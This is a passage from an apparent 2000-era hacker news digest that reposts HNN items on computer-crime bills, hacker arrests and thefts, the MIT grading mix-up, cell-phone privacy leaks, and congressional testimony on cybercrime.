experiment, but said it would likely be used only by a small community of pirates and "privacy nuts." "If it is adopted, it will be adopted by people who want to exchange illegal information and by people who are rabid about privacy and security, which is a relatively small universe," Scheirer said. Scheirer pointed out that the Web is trustworthy because of the content on certain domains, and he likes the convenience of tracking devices such as cookies that remember log-in names and passwords. "Many of the advantages of Freenet are disadvantages to me," he said. Nonetheless, Scheirer said the advent of Freenet and Gnapster, an open-source clone of Napster, illustrated the need for debate about copyright laws in the age of ubiquitous digital distribution channels. "There are larger questions about the implications of these technologies," Scheirer said. @HWA 139.0 HNN:Mar 8th: New Bills Before Congress ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Two new bills are before congress that could have serious implications if passed. S2092 would get rid of the $5000 in damages limit before the FBI could investigate. It also authorizes a roving internet tap as well as lowering the age of an adult to 15. (Seems it was a problem proving any damages so lets just get rid of the limit! But if there are no damages shouldn'9t the crimes be treated as trespass which is a minor misdemeanor. If this passes someone can report someone has broken into their home PC but not damaged anything but the FBI has jurisdiction to investigate countrywide with a roving internet tap. Like they aren't overworked enough already. Federal Register - via Cryptome http://cryptome.org/s2092.txt S2105 Would make it a crime to tamper with identification codes put in place by manufacturers. Disabling or changing such codes would be a crime. So changing a MAC address or disabling the PIII ID code would now be a crime. Federal Register - via Cryptome http://cryptome.org/s2105.txt @HWA 140.0 HNN:Mar 8th:Security Focus Hires Kevin Poulsen ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Aleph One SecurityFocus.com, announced yesterday the addition of Kevin Poulsen as the company's editorial director. Poulsen has authored a weekly column on computer security for ZDTV, covering tech news for ZDNN, and contributed free lance articles for Computer Shopper and Wired Magazine. Kevin is probably best known for his illicit forays into the telephone network which turned him into a fugitive who was wanted by the FBI. Security Focus http://www.securityfocus.com/level2/?go=announcements&id=65 Tue Mar 07 2000 SecurityFocus.com hires Kevin Poulsen as Editorial Director SAN MATEO, Calif.--(BUSINESS WIRE)--March 7, 2000-- Poulsen opens Washington D.C. bureau as SecurityFocus.com enhances position to become security industry's leading news watchdog. SecurityFocus.com, the Internet's premier security information portal, announced today the addition of Kevin Poulsen as the company's editorial director, a newly created position. Poulsen's proven industry expertise, and his reputation as a security industry insider, will further advance SecurityFocus.com's reputation as a premier security information source for news-breaking security industry issues and technological developments worldwide. Poulsen's opening of SecurityFocus.com's new Washington D.C. office will strategically place the company in the geographic center of national Internet security policy, legislation, and news. "Kevin brings yet another well-recognized name from the security industry to our staff," said Art Wong, CEO of SecurityFocus.com. "We consider him an industry luminary, especially when you consider that at one time he was one of the first phone and computer hackers to ever be identified and caught. There's no doubt that he brings an `insider's view' to the industry as both a security professional and as a perpetrator. He has proven his journalistic achievements and we expect him to push our growth as a news provider in the information security space." "This is an extraordinary opportunity for me to join a growing niche company where I can marry my years of experience as a journalist with my firsthand knowledge of all sides of the computer security world." said Poulsen. "I plan to lead the charge as we push to expand SecurityFocus.com's growing reputation as one of the leading security information resources on the Internet today. Simply put, I expect SecurityFocus.com to become the first stop for anyone hungry for accurate and timely news on computer security and privacy." About Kevin Poulsen Poulsen brings a range of experience to his new position as editorial director for SecurityFocus.com. He has maintained secure networks at SRI International, a defense contractor, and worked as a network administrator at Sun Microsystems. As a hacker, Poulsen's illicit forays into the telephone network turned him into a fugitive from the FBI, wanted on national security charges that he didn't commit, and featured twice on NBC's Unsolved Mysteries. By 1996, a reformed and penitent Poulsen began building a career as a journalist, authoring a weekly column on computer security for ZDTV, covering tech news for ZDNN, and contributing various high-tech articles to publications like Computer Shopper and Wired Magazine. Poulsen was the first to report on the Y2K survivalist phenomenon, and more recently broke the story for ZDNN on presidential hopeful John McCain's unprecedented use of targeted ad banners in his campaign strategy. Keeping the Internet Secure SecurityFocus.com is the most vital online community available where individuals and corporations can find a range of security information from the industry's leading authorities. With Internet security on the forefront of the minds of eBusinesses and eConsumers alike, SecurityFocus.com delivers 24x7 access to security links and resources that include news, books, mailing lists, tools, products, and security services. In addition, SecurityFocus.com features one of the strongest security advisory collections, including the latest information on system vulnerabilities and available Internet-based solutions. One of SecurityFocus.com's greatest features, Bugtraq, is the industry's most read online security mailing list. The company also hosts forums on security-relevant topics that include Information Warfare, Microsoft Security, Security Incidents, and Executive Security. These forums foster discussions among security professionals and systems managers who are responsible for securing various corporate resources. These forums also feature security vendors and product developers who share their experiences and recommendations on the latest security issues and responses. About SecurityFocus.com San Mateo-based SecurityFocus.com is the leading online news and information resource company designed to facilitate and enhance security awareness from individual users to major corporations. By providing the Internet's largest and most comprehensive database on security intelligence, SecurityFocus.com's staff is committed to stimulating discussion between vendors and users on maintaining a safe and enriching Internet environment. To discover more about SecurityFocus.com, visit www.securityfocus.com . Note to Editors: All names are trademarks or registered trademarks and the property of their respective holders. Kevin Poulsen may be reached at klp@securityfocus.com @HWA 141.0 HNN:Mar 9th: Coolio Charged with Web Defacements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Coolio (Dennis Moran) has been charged by New Hampshire officials with two counts of unauthorized access to a computer system, for defacing the web pages of dare.org. Dare.org is a anti-drug web site set up by the Los Angeles Police Department. If convicted Coolio could receive 15 years in prison and a $4,000 fine for each count. Coolio has also admitted to defacing a site run by the U.S. Commerce Department, and a site operated by RSA Security Inc. The investigations into those defacements is ongoing. Coolio is not considered a suspect in the recent DDoS attacks. Digital Mass http://www.digitalmass.com/news/daily/03/08/hacker_arrest.html Attrition.org - Mirrors of Coolio Defacements http://www.attrition.org/mirror/attrition/coolio.html Digital Mass; N.H. teen hacker 'Coolio' arrested on state hacking charges By Associated Press, 03/08/00 CONCORD, N.H. - A teen-ager who admitted hacking into several Web sites was charged Wednesday afternoon with defacing an anti-drug site set up by the Los Angeles Police. Dennis Moran, 17, of Wolfeboro, faces two state charges of unauthorized access to a computer system, the attorney general's office said. Each felony is punishable by up to 15 years in prison and a $4,000 fine. Under New Hampshire law, Moran is considered an adult. Moran surrendered at his home and was taken to the Wolfeboro police station, where a bail commissioner released him on $5,000 personal recognizance, said Assistant Attorney General Michael Delaney. No restrictions on computer use or other special conditions were placed on his bail, Delaney said. The charges were filed in the Southern District Court for Carroll County, Delaney said. No arraignment date has been set. Moran's father, Dennis Moran, when reached by phone at work Wednesday afternoon, was upset that authorities had not notified him his son had been arrested. The teen-ager is the oldest of three children who all live with their father. "He's only 17, for crying out loud; he's not a killer or anything. I don't believe this,'' he said. The teen-ager was charged with hacking into DARE.com twice last November and defacing it with pro-drug slogans and images, including one depicting the Disney character Donald Duck with a hypodermic syringe in his arm. Moran, who uses the Internet name "Coolio,'' also admitted in an interview with The Associated Press last week that he had hacked two other sites: a U.S. Commerce Department site that outlines rules for exporting chemicals that could be used to produce weapons, and a site operated by RSA Security Inc., an Internet security company. "Those investigations are still going on, and there may be additional charges,'' said First Assistant U.S. Attorney David Vicinanzo. Moran also was questioned by the FBI last month about several "denial of service'' attacks on major commercial sites, including Yahoo.com and E-bay.com. He has denied being involved in those attacks, and no charges have been filed in those cases. Although the FBI had said they were seeking someone using the Internet signer "Coolio'' in those attacks, authorities have also said Coolio - the name of a popular rap singer - is used by many people online. Delaney suggested Moran was unlikely to face charges in the denial of service attacks. "The focus of our investigation at this point is unrelated to distributed denial of service attacks on large Internet company Web sites,'' he said. @HWA 142.0 HNN:Mar 9th: Grades Altered At MIT By Student ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Twenty-two students of a biology class at the Massachusetts Institute of Technology had their grades altered by an electronic intruder. Twenty of the students where given lower grades while two received higher ones. An internal MIT investigation has revealed that the culprit did not attend the class but did not say if the person was a student at the school or not. MIT representatives also said that they are unsure of the intruder's means of access but are continuing to investigate. Boston Globe http://www.globe.com/dailyglobe2/069/metro/MIT_says_a_hacker_altered_class_grades+.shtml MIT says a hacker altered class grades By David Abel, Globe Correspondent, 3/9/2000 AMBRIDGE - A hacker broke into an MIT computer system and altered the grades of 22 students in a biology class, institute officials said yesterday. The grades of 20 of 120 students in an undergraduate cell biology class were lowered, while two others were given higher marks, said officials of the Massachusetts Institute of Technology. The professor and teaching assistants for the class declined to talk about the investigation, but an institute spokesman said officials have identified someone from outside the class as the culprit. The spokesman would not say whether the person was a student at MIT. The grade-tampering scandal has left students uneasy, since the professor, Harvey Lodish, announced there had been a cheating incident at the end of class last Thursday, pleading for students to come forward if they knew who was responsible. ''From the beginning, my only hope was that it was someone from outside the class,'' sophomore Tara Mullaney, 19, said before a section of the class met yesterday. ''Since then, [the professor and teaching assistants] have been trying to keep this low.'' Teaching assistants noticed changes to grades on the class's first exam after comparing hard copies with scores recorded on the computer. Believing that the school's computer system is secure, professors suspect that the hacker filched one of their passwords, students said. But Lodish and the teaching assistants were tight-lipped about the breach. ''I will not talk with you about this,'' Lodish responded to a Globe query by e-mail. ''The situation is being resolved, and all discussions about this issue are completely confidential.'' Ken Campbell, an institute spokesman, said that the person responsible for the tampering had been identified and that school officials are investigating the person's motive and means of access. Some students speculated that the hacker may have intended to set up the students whose grades were raised. ''They know who they are and why they did it,'' said Alanna Pinkerton, 19, a junior in the biology class. ''The professors and the teaching assistants also know; everything else is hearsay.'' The two students whose grades were increased are unlikely to have left themselves open to cheating charges, a biology faculty member said. ''It just wouldn't be a sensible thing to increase your own grades,'' said Bob Sauer, chairman of the biology department. ''But what I've heard is it's something far less nefarious.'' There have been previous incidents of cheating at MIT. In 1990, 78 of the 250 undergraduates in an introductory engineering course were found to have turned in identical computer codes on a homework assignment. Many of those students said cheating was rampant at MIT. A study a year later found that 83 percent of MIT students admitted to cheating on homework at least once during the 1991-92 school year. In that survey, nearly half of all students admitted stealing other people's phraseology, ideas, or arguments. About 40 percent said they had misrepresented or fudged data in a lab report or research paper, and about one-fifth said they had copied from another person's paper or published work without acknowledgment. Still, the consequences for cheating at MIT are grave. If the hacker responsible for tampering with the grades in the cell biology class is a student, then he or she could face expulsion, institute officials said. This story ran on page A01 of the Boston Globe on 3/9/2000. � Copyright 2000 Globe Newspaper Company. @HWA 143.0 HNN:Mar 9th: Lloyd's Defacer Arrested and Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Simple Nomad and Lady Sharrow An unidentified man has been arrested and released on bail for defacing the web sites of Lloyds' of London and Railtrack earlier this year. He has been charged under sections one and three of the Computer Misuse Act regarding unauthorized access and the modification of computer systems. He was arrested by officers from Scotland Yard's Computer Crime Unit. The Register UK http://www.theregister.co.uk/000308-000020.html Posted 08/03/2000 4:04pm by Tim Richardson Railtrack hacker arrested A man has been released on police bail after being arrested in connection with the hack attacks that paralysed the Web sites of Lloyds of London and Railtrack at the beginning of the year. The man was arrested on Friday and but has to report back to police in June pending further enquiries. The alleged offences come under sections one and three of the Computer Misuse Act regarding unauthorised access and the modification of computer systems. He was arrested by officers from Scotland Yard's Computer Crime Unit. The identity of the man was not released. Earlier this year The Register carried an exclusive interview with a member of the group which claimed responsibility for hacking into the Lloyds of London Web site. "MisterX", as he called himself, also claimed that credit card transactions across the Internet were unsafe, and that he was able to hoover-up confidential data from Web sites. � @HWA 144.0 HNN:Mar 9th:Cross Green Market Raided ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow 30 police officers and 19 industry investigators raided Cross Green Market in Leeds England and seized over �500,000 of pirated software. The software included office applications, games and DVDs. Investigators from the European Leisure Software Publishers Association (ELSPA), Mechanical Copyright Protection Society (MCPS), Microsoft, Nintendo and Sony where involved in the raid. Silicon.com - If Anyone has a better link please submit it. This lame site won't let you link directly to the story. http://www.silicon.com/bin/bladerunner?REQUNIQ=952539836&30REQEVENT=&REQAUTH=21046 @HWA 145.0 HNN:Mar 9th:AT+T Sends Private Info of Cell Surfers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Contributed by Simple Nomad AT+T has confirmed that it sends the private phone number of its cell phone subscribers along with each web page request when those users are surfing via their cell phone. Yesterday HNN mentioned that SprintPCS did this as well, they have since said that they intend to change their policy of transmitting customers' phone numbers to Web sites. San Francisco Chronicle http://199.97.97.16/contWriter/cnd7/2000/03/08/cndin/0305-0002-pat_nytimes.html Hot Topics Sprint to Hide Web Surfers' Phone Numbers TODD WALLACK c.2000 San Francisco Chronicle After taking heat from privacy advocates, Sprint PCS said Tuesday it plans to change its policy of transmitting customers' phone numbers to Web sites they access with their cell phones. But a second company, AT&T, confirmed that it, too, automatically sends customers' phone numbers to Web sites through its wireless data service. The phone numbers are embedded in every request for a Web page. Privacy watchdogs complained the practice makes it too easy for Web sites to forward the phone numbers to their sales department for follow-up calls. Moreover, Web site operators could potentially use databases to match the phone numbers with users' real names and other personal information. At least one analyst said the practice could hurt AT&T's and Sprint's fledgling efforts to persuade customers to use their cell phone services to access the Web. ``Personal privacy is paramount,'' said Ken Dulaney, a San Jose analyst with the Gartner Group. ``If that isn't one of the first concerns of any business, it is likely the business is not going to do well in the long run.'' Only about 50,000 people in the United States now use cell phones to access the Web, Dulaney said, but experts expect millions to do so in coming years, making it an important market. Sprint said it will let customers decide whether to give out their phone number in the next version of its wireless Web service, scheduled to be rolled out in April or May. If users don't make a choice, Sprint will automatically send Web sites a ``bogus number'' as their user ID. Sprint, though, denied it was making the change because of complaints by consumers' and privacy advocates. A Sprint executive said the new product has been in the works for more than a year. ``We have always been focused on customers' privacy,'' said Keith Paglusch, PCS senior vice president for operations. Paglusch said he didn't realize any customers were upset about the current practice until The Chronicle published a story about the issue in Tuesday's paper. He said it was ``a nonissue'' in focus groups. And a Sprint spokesman pointed out that it has agreements with a dozen partners featured on the cell phone screen that bar them from using the phone number for telemarketing or other purposes. AT&T spokesman Ken Woo also brushed aside privacy worries. Woo said the phone company hasn't received any gripes from customers about the practice, which it first publicly disclosed Tuesday. Woo also declined to say whether the company is considering changing the policy. ----- (The San Francisco Chronicle Web site is at http://www.sfgate.com) Addendum: Cell Phone Surfers Web Privacy contributed by Space Rogue Yesterday HNN linked to a story in the San Francisco Chronicle that blamed AT+T for sending subscribers cell phone numbers along with web requests when users surfed with their phones. We received an email, apparently from an AT+T technician, refuting that article. He said "Our (AT+T) web-accessible phones do not use the cellular network at all to surf the web. Our phones use CDPD--an IP-based protocol having nothing to do with cellular. Each IP is a real Internet routable IP that is assigned the same as any CDPD modem--orthogonal to the cellular phone provisioning. Many current PocketNet phones don't even have voice service (data only) so they can't even send a MIN!" @HWA 146.0 HNN:Mar 10th: MIT Blames Cyber Vandals For Sorting Error ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dave Sjerven When a computerized grading system failed to report the proper grades for a cell biology class at the Massachusetts Institute of Technology officials immediately concluded that it must have been the work of electronic intruders. After a thorough investigation MIT discovered that in fact the changed grades were due to a spreadsheet sorting error. (The simplest answer is usually the correct one.) MIT http://web.mit.edu/newsoffice/nr/2000/grades.html ComputerWorld http://www.computerworld.com/home/print.nsf/all/000309F556 Boston Herald http://www.bostonherald.com/bostonherald/lonw/error03092000.htm Boston Globe (It was on the front page of the Globe yesterday, today it made it to B3) http://www.boston.com/dailyglobe2/070/metro/MIT_grade_changes_tied_to_teaching_assistant_s_error+.shtml MIT Grade changes at MIT caused by slip-up in spreadsheet sorting of names and grades MARCH 9, 2000 An incident of grade-changing on an MIT computer -- investigated as a computer hacking incident -- has turned out to be a simple slip-up in the computerized sorting of names and grades on a spreadsheet. Professor Harvey Lodish this morning informed an MIT spokesman that the mystery was solved. He said the changes were made by mistake by a person authorized to enter grades. The professor declined to identify the person. The sorting of a grades spreadsheet is done by using a computer mouse to highlight the two columns of names and corresponding grades. In this case, there was a slip-up in the use of the mouse and only the column of names was sorted, resulting in grades being assigned to the wrong people. The error raised the grades of two students and lowered the grades of 20 students. -=- Nuff'said on this one.. - Ed ROFL @HWA 147.0 HNN:Mar 10th:NY Wants Privacy for Consumers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The New York State Senate on Wednesday unveiled a package of new legislation to protect the privacy of consumers, drivers, and patients that would place new restrictions on credit agencies, schools, telemarketers, hospitals, pharmacies, and other organizations that gather and use personal information. "Our recommendations were guided by a belief that individuals have a basic right to know who is collecting personal information, how it is being used and whether that information is shared or sold without their knowledge or approval," said Senate Majority Leader Joseph Bruno. (Damn. Makes me want to move to New York just so I can vote for this guy.) Reuters - via TechWeb http://www.techweb.com/wire/story/reuters/REU20000308S0010 NY Senate Seeks Internet Privacy Laws (03/08/00, 6:05 p.m. ET) By Reuters NEW YORK (Reuters) -- The New York State Senate, addressing a growing controversy about how Internet companies gather and use information about customers, Wednesday unveiled a package of new legislation to protect the privacy of consumers, drivers, and patients. The proposals came after online advertising company DoubleClick made headlines last week, backing down on a plan to identify anonymous Web surfers. Privacy advocates have fiercely objected to plans under which companies collect and share information that identifies individuals, as opposed to data on demographic groups. But the senate did not limit its reach to just Internet data. The legislation also contains new restrictions on credit agencies, schools, telemarketers, hospitals, pharmacies, and other organizations that gather and use personal information. The legislation would also protect people who use financial services, including those offered by major banks headquartered in New York City. One proposal would bar businesses, schools, and other outfits from sharing or selling Social Security numbers. What the senate called surreptitious video surveillance in a private dwelling without consent would also become a new crime. "Our recommendations were guided by a belief that individuals have a basic right to know who is collecting personal information, how it is being used and whether that information is shared or sold without their knowledge or approval," Senate Majority Leader Joseph Bruno (R), said in prepared remarks. Identity theft is one of the fastest-growing crimes in the nation, claiming about 400,000 victims a year, the senate said in written remarks. To combat this type of crime, the senate said it would advance legislation making it a crime to knowingly obtain personal information with the intent to use the data to get goods or services in another person's name. Patients' privacy also would be protected: pharmacies, hospitals and other health care providers would be barred from sharing or selling what the senate called personally identifying medical or health data for any purpose not directly related to the person's treatment. The only exception would be for federal or state reporting requirements. The senate also would apply stiff rules for telemarketers, barring them from accessing customers' checking, savings, and other accounts without approval. The sale of drivers' Motor Vehicle registration and title information also would be prohibited. And prisoners, some of whom do contract work on computers, would be prohibited from tapping into personal information. In addition, schools and colleges would only be able to use their students' Social Security numbers for identification. The senate also would apply new laws to credit agencies, banning them from selling consumers' credit card numbers for unauthorized purposes. It estimated the three largest agencies have records on 160 million individuals, including birth dates, addresses, phone numbers, Social Security numbers, job and salary history, credit transactions, and more. While the federal Fair Credit and Reporting Act puts limits on an agency's ability to share or sell information in people's credit reports, the credit agencies often get around that by selling basic data, such as Social Security number, age, phone and address, the senate said. A senate task force studied the privacy issue for about a year, and the Republican-led body next week expects to start approving its new legislation. Not to be outdone, the Democrat-controlled Assembly said it would hold two hearings in March on consumer privacy. Saluting Chase Manhattan for no longer giving outside marketers their customers' personal and financial information without consent, the senate called on all financial institutions to follow the same standard. @HWA 148.0 HNN:Mar 10th:Curador Taunts Police ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles "Law enforcement couldn't hack their way out of a wet paper bag. They're people who get paid to do nothing. They never actually catch anybody," said Curador to an Internet News reporter. Curador has made a practice of breaking into e-commerce sites, grabbing their customer database and then posting the numbers online. So far he claims to have gotten into eight systems and has posted thousands of valid numbers to his web site. His previous web sites at e-crackerce.com and free-creditcard.com, which themselves where registered with fraudulent cards, have been shut down. Curador has said that he will publicize his newest site with a banner on the Microsoft Banner Network. Curador's first cyber break in occurred back in January. Internet News http://www.internetnews.com/ec-news/article/0,1087,4_318381,00.html E-Commerce News Curador Taunts Police Over Site Break-Ins March 9, 2000 By Brian McWilliams InternetNews.com Correspondent E-Commerce News Archives Curador, the cracker who has stolen credit cards from at least eight small e-commerce sites and then posted them online, is growing more brazen by the minute. In an interview with InternetNews Wednesday, Curador claimed he has hit five new Web firms and will soon publish hundreds more stolen credit card numbers at a new site, which he said he registered using one of the stolen cards. "Law enforcement couldn't hack their way out of a wet paper bag. They're people who get paid to do nothing. They never actually catch anybody," said Curador. After hitting his first site, Shopping Thailand, on Jan. 31, Curador has so far eluded arrest. In February, Curador stole and posted credit cards from mobile phone provider ProMobility, LTAmedia, a self-improvement products site, and the homepage of the American Society of Clinical Pathologists. Curador's most recent victims include NTD, a Web development firm in the U.K., Vision Computers, a computer retailer, as well as Sales Gate, an ecommerce portal, and online herbalist Feelgood Falls. Using a stolen card, Curador set up a site at e-crackerce.com in late February where he posted several thousand of the purloined card numbers. That site was soon shut down by the hosting company. A few days ago, Curador re-emerged at free-creditcard.com, also apparently registered using one of his victim's credit cards. That site has also been disabled. To publicize his latest site, Curador said he has created an animated ad banner and signed up for the Microsoft Banner Network, which will display Curador's banner at participating Web sites. "The banner says, 'Find out exactly what you can do if you have Microsoft IIS Web server and ecommerce.' And if you click on it it'll take you right to my site," said Curador. Curador has admitted to targeting Windows NT systems in his previous break-ins, using a known vulnerability in a feature called RDS, which was first publicized by a security consultant who goes by the hacker nickname of Rain Forest Puppy. But Curador now says he's turned his attention to Unix servers, and claims to have captured encrypted password files that he is attempting to crack. "Unix is harder, but I want some more interesting targets. It's too easy to do Windows and I can't be bothered any more." Chris Davis, a security expert with Tyger Team Consultants in Ottawa, Ontario, which has been retained by several of Curador's victim sites, said the cracker's decision to target UNIX machines will make him easier to track down. "I'm laughing all the way to the court house, because Unix logs much better than NT. Any time he sends a packet to a Unix machine it's going to be logged somewhere, and that's going to make our job easier," said Davis. Claiming to be a Webmaster for an ecommerce company, Curador has said his goal is to wake up sites about their security vulnerabilities. But when asked Wednesday whether he feels any remorse toward the people whose cards he has stolen, Curador was unapologetic. "It's just their tough luck. It's not my fault that the site (was insecure). If I didn't do it, somebody else would have and not advertised it," said Curador. Davis admitted law enforcement agencies have been frustratingly slow in investigating the case, but he is confident that Curador's crime spree will soon come to an end. "He's not as bright as he thinks he is. I could be underestimating him, but I really doubt it. In a combined effort, we are far better at what we do than this guy is, and I can't wait to see the look on this guy's face when he gets arrested." @HWA 149.0 HNN:Mar 10th:DDoS Attacks Used As Reason for National Court Order ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Using the example of the recent distributed denial of service attacks, law enforcement representatives have been asking Congress for a national court order. Currently law enforcement must seek a separate court order in each state they track a single piece of data to get to its source. TechWeb http://www.techweb.com/wire/story/TWB20000308S0009 Law Enforcers May Hunt Hackers With Federal Powers (03/08/00, 5:26 p.m. ET) By Mary Mosquera, TechWeb WASHINGTON, D.C.-- The Clinton administration is thinking about letting law enforcement get national court orders to trace electronic communications to help hunt down hackers and other cyber criminals, a senior Justice Department official told lawmakers Wednesday. "Obtaining court orders in multiple jurisdictions does not advance any reasonable privacy safeguard, yet it can be a substantial impediment to a fast-paced investigation," said Deputy U.S. Attorney General Eric Holder. But it might be extremely helpful to provide a nationwide effect for trap and trace orders, he told the Senate Commerce committee looking at recent cyber attacks. Any changes to existing law will be sensitive to privacy, which is spelled out in the Fourth Amendment and federal statutes, he told senators. Sen. Ron Wyden (D-Ore.) said he was concerned about encroachment on citizens' privacy with expanded powers, adding "I worry that the cure could be worse than the ailment." Investigators are subject to laws made for offline crime in tracking. An example is the case of the hackers responsible for the distributed denial-of-service attacks that temporarily halted popular Internet sites last month. Law enforcement must seek a separate court order in each state they track a single piece of data to get to its source. "We are making progress in the investigation," Holder said of the denial-of-service crimes, but it is slow going. Industry must lead to promote security, and government must make its own networks a model of security, but law enforcement also must be fully funded to acquire the technical expertise and staff, said Michael Vatis, director of the FBI's National Infrastructure Protection Center. And while there are companies that prefer not to report a crime because of fear of public embarrassment due to a security lapse, the situation has improved, he said. "Companies increasingly realize that deterrence of crime depends on effective law enforcement, and the long-term interests of industry depend on establishing a good working relationship with government to prevent and investigate crime," Vatis said. One initiative, InfraGard, has industry inform local FBI about intrusions using secure e-mail in both a sanitized and detailed format, the more descriptive one for the investigation and the more anonymous version for sharing about system vulnerabilities, he said. The Internet has changed how communications are transmitted and magnified the problem of gathering evidence, Martha Stansell-Gamm, chief of the computer crime section at Justice, told reporters outside the hearing. "It's not an enhancement of our legal powers so much as sort of a return to status quo," she said. "In the old days, there used to be one phone company, so if you got an order to trace a communication, all the information was contained by that entity, Ma Bell. It didn't matter if it were a local phone call or a national phone call from coast to coast. Now, one communication that we identify can be carried at the same time by many different phone companies, local and long distance, several different Internet service providers, and a cell phone provider or two," she said. If a communication is carried by a number of carriers, one order can elicit only limited information. "But we have to get another order in the district where another company is located, and this is for the same communication," Stansell-Gamm said. Other possible changes to laws covering computer crime may be an increase in the penalty and lowering the threshold at which damage is caused. @HWA 150.0 HNN:Mar 10th:Voluntary Compliance With Security Practices Recommended ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Anonymous Raj Reddy, co-chairman of the President's Information Technology Advisory Committee said while testifying before Congress that "Rather than leaving the Internet vulnerable because a few persons or organizations are careless or reckless, we should develop an information infrastructure that is not dependent on voluntary compliance with security practices and policies." (Voluntary compliance? Yeah, that gives me the warm fuzzies.) Federal Computer Week http://www.fcw.com/fcw/articles/2000/0306/web-3survive-03-09-00.asp A strong Internet is a secure Internet BY Diane Frank 03/09/2000 The best way to secure the Internet is to make the Internet itself stronger, a member of the President�s Information Technology Advisory Committee testified Wednesday before Congress. Many security problems faced by agencies and industry stem from administrators not paying close enough attention to their systems, Raj Reddy, co-chairman of the PITAC and a computer science professor at Carnegie Mellon University, testified before the Senate Commerce, Science and Transportation Committee�s Communications Subcommittee. "Rather than leaving the Internet vulnerable because a few persons or organizations are careless or reckless, we should develop an information infrastructure that is not dependent on voluntary compliance with security practices and policies," Reddy said, suggesting the creation of a "self-healing" network. The concept of survivability � ensuring that services are available when needed and that information is delivered in a timely fashion � runs through many of the funding recommendations in the PITAC�s February 1999 report to the president, "Information Technology Research: Investing in Our Future." The PITAC is reviewing federal research plans and will issue new recommendations later this year. In making the Internet more reliable, a self-healing network would provide security by catching problems as they happen, he said. "A self-healing network would work similar to the human immune system," Reddy said. "It would constantly monitor the system, analyze what is in the system, and if it finds something wrong within the system, immediately begin actions to remedy the problem." To develop the technology behind a more dependable Internet, Reddy urged the federal government to fund a national network test bed. Such an arrangement would be similar to the partnership created by several federal agencies and universities to develop and test the high-speed Next Generation Internet. @HWA 151.0 HNN:Mar 10th:Chinese Gangs Blamed For Identity Theft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In testimony before the Senate Judiciary Subcommittee on Technology, Terrorism and Government, US Secret Service Special Agent Gregory Regan explained that organized Chinese fraud rings in the US and overseas are more and more likely to break into electronic databases to compromise credit and identity details. In 1999 there were 1,147 cases of identity theft resulting in 644 convictions. The UK Register http://www.theregister.co.uk/000308-000016.html Posted 08/03/2000 2:20pm by Thomas C. Greene in Washington Chinese hackers turn to identity theft Organised Chinese fraud rings on the mainland and overseas are more likely to hack databases to compromise credit and identity details than ply the more traditional avenues of bribing bank employees favoured by their Nigerian counterparts, a federal investigator claims. "The Chinese gangs have moved into the electronic age where they're using hacking techniques and Internet theft," US Secret Service Special Agent Gregory Regan explained in testimony before the Senate Judiciary Subcommittee on Technology, Terrorism and Government Information Tuesday. Identity theft is an increasingly easy scam now that so much information is available on line, Regan warned. "The Internet makes it unnecessary for criminals to obtain identity documents," he said. The Net is creating a "faceless society" where it's easy for an identity fraudster, even one overseas, to open a credit account on line, sometimes with nothing but his victim's name and social security number, Regan observed. There were 1,147 cases of identity theft resulting in 644 convictions reported in the US during 1999 alone. The US Social Security Administration reports that over 81 percent of social security number misuse involves ID theft. Most incidents are part of some larger, organised criminal enterprise. Committee Chairman Jon Kyl (Republican, Arizona) sponsored the Identity Theft and Assumption Deterrence Act, which became law in 1998. He convened Tuesday's hearing to review the act's success and seek suggestions for its improvement. The act requires the Federal Trade Commission to assist ID theft victims, which it now does, in part, via a Web page here. In spite of recent efforts to address the problem, victims often find that recovering their identity is immensely more difficult than losing it. Witness Maureen Mitchell recalled a seemingly endless series of difficulties in sorting out her records after being vicitmised by fraudsters who ran up US $110,000 in bogus charges in her and her husband's name. Her suggestion for amending the bill would require merchants and credit agencies to develop a single, unified protocol for victim notification. "We had to submit handwriting samples to twenty different merchants; we had to submit notarised documents and affidavits. It's like filling out your tax return twenty times with twenty different sets of instructions," she observed dryly. Having considerable personal experience with filling out American tax returns, we can say without hesitation that the victim is being punished quite severely here, and can only offer our hope that the criminals might suffer half as much.� @HWA 152.0 HNN:Mar 10th: U.S. Urges Internet Businesses to Help Fight Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Turtlex A report released by a working group led by Attorney General Janet Reno has said that Internet businesses need to cooperate with law enforcement to fight online crime. The 60-page report recommended more resources and training for law enforcement, urged greater promotion of cyber ethics and concluded that the existing laws should be adequate to protect against most online crimes. Reuters - Yahoo http://dailynews.yahoo.com/h/nm/20000309/pl/tech_crime_1.html USA Today http://www.usatoday.com/life/cyber/tech/cth524.htm Reuters' Thursday March 9 1:34 PM ET U.S. Urges Internet Businesses to Help Fight Crime By James Vicini WASHINGTON (Reuters) - The 